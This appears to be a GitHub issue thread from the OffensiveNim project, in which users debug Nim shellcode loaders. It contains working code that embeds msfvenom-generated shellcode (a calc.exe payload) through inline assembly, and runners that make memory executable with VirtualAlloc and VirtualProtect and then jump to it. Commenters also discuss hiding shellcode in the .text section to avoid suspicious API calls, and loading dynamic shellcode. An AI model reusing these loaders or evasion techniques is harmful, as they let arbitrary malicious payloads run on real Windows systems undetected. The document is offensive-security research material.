Comments (9)
Haven't figured out why it's crashing yet. However, I did get shellcode execution via inline assembly working. This is a "workaround" for manually allocating the shellcode to the .text
section. inline assembly gets allocated to the .text
section automatically (see here).
proc runsc(): void =
# msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp
asm """
.byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xaa,0xc5,0xe2,0x5d,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00
ret
"""
runsc()
echo "OK wassup" # This never executes
Confirmed via CFF Explorer:
from offensivenim.
Interesting, yeah i've reproduced this and don't know exactly whats going on here. I'm probably going to have to break out windbg to figure out why it's crashing after executing the shellcode. Will investigate further when i get some time.
from offensivenim.
I managed to (kind of) port both functions to Nim as below. The calc payload (from msfvenom
) succesfully executes, but the program terminates with error Error: execution of an external program failed: program.exe
, which halts its execution :/
Edit: The various msfvenom
exitfunc options seem to all give the same result. However, when using calc.exe
transformed into shellcode using donut
, the error is NOT returned. Still though, execution of the thread does not continue after the payload returns, which may be related to the shellcode being executed in the same context as the main program...
import winim/lean
proc runShellcodeVirtualAlloc[I, T](payload: var array[I, T]): void =
var allocated = VirtualAlloc(nil, len(payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
doAssert not allocated.isNil(), "Error executing VirtualAlloc()"
copyMem(allocated, payload[0].addr, len(payload))
let f = cast[proc(){.nimcall.}](allocated)
f()
proc runShellcodeVirtualProtect[I, T](payload: var array[I, T]): void =
var oldProtect : DWORD
var ret = VirtualProtect(payload.addr, len(payload), PAGE_EXECUTE_READWRITE, oldProtect.addr)
doAssert ret != 0, "Error executing VirtualProtect()"
let f = cast[proc(){.nimcall.}](payload.addr)
f()
when defined(windows):
# msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp
var payload : array[276, byte] = [
byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xaa,0xc5,0xe2,0x5d,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00 ]
when isMainModule:
runShellcodeVirtualProtect(payload)
#runShellcodeVirtualAlloc(payload)
echo "This is never printed because of the error"
(Based on the following code which does something similar: https://github.com/mratsim/photon-jit/blob/ef1954406d6f23677f702151397fcd6d3889aad3/photon_jit/photon_types.nim#L47)
from offensivenim.
Sounds great! Regarding moving shellcode to the .text
segment of the binary to avoid making Windows API calls for executable memory, someone in the Nim discord said that should be possible by using codegendecl
pragma to tell the compiler to move const
s to the .text
section. Haven't looked into this yet, could be a nice "nimified" way to avoid suspicious Windows API calls though.
https://nim-lang.org/docs/manual.html#implementation-specific-pragmas-codegendecl-pragma
from offensivenim.
Anyone got a working solution to make this method dynamic instead of hardcoding the shellcode?
I tried using this : https://nim-lang.org/docs/manual.html#statements-and-expressions-assembler-statement without success so far
from offensivenim.
Anyone got a working solution to make this method dynamic instead of hardcoding the shellcode?
I tried using this : https://nim-lang.org/docs/manual.html#statements-and-expressions-assembler-statement without success so far
I've been trying for a long time, but I haven't found a solution.Have you solved the problem?
from offensivenim.
Anyone got a working solution to make this method dynamic instead of hardcoding the shellcode?
I tried using this : https://nim-lang.org/docs/manual.html#statements-and-expressions-assembler-statement without success so farI've been trying for a long time, but I haven't found a solution.Have you solved the problem?
I have a working solution to inject dynamic shellcode but haven't found a solution to do it using inline assembly. In my solution, the shellcode isn't stored in the .text section. Let me know if you are still interested :)
from offensivenim.
Anyone got a working solution to make this method dynamic instead of hardcoding the shellcode?
I tried using this : https://nim-lang.org/docs/manual.html#statements-and-expressions-assembler-statement without success so farI've been trying for a long time, but I haven't found a solution.Have you solved the problem?
I have a working solution to inject dynamic shellcode but haven't found a solution to do it using inline assembly. In my solution, the shellcode isn't stored in the .text section. Let me know if you are still interested :)
Yes, can you show me your solution? thank you!!!
from offensivenim.
I just provided a POC via a pull request to this repo:
#29
Don't hesitate if you have any question!
from offensivenim.
Related Issues (20)
- Parameter parsing question HOT 2
- /OffensiveNim/src/clr_host_cpp_embed_bin.nim(28, 12) Error: Must be compiled in cpp mode HOT 2
- Typographical error
- Mention -d:noRes for winim
- Importing NimMain with msvc compiler fails. HOT 2
- Trailing whitespace
- Makefile - opt
- CLR HOST CPP FAILS WHEN COMPILING
- compile
- Error Running make - memfd_python_interpreter_bin.nim
- Load (0x80131604) [CLRError] HOT 1
- [Contribution]: steal token HOT 4
- minidump access denied HOT 2
- Update example for HTTP Request HOT 1
- why it is a advantage?
- amsi patch
- Fail to compile chrome_dump_bin.nim
- Making scripts more reusable HOT 1
- Another way to invoke the EntryPoint of .NET assembly. HOT 3
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from offensivenim.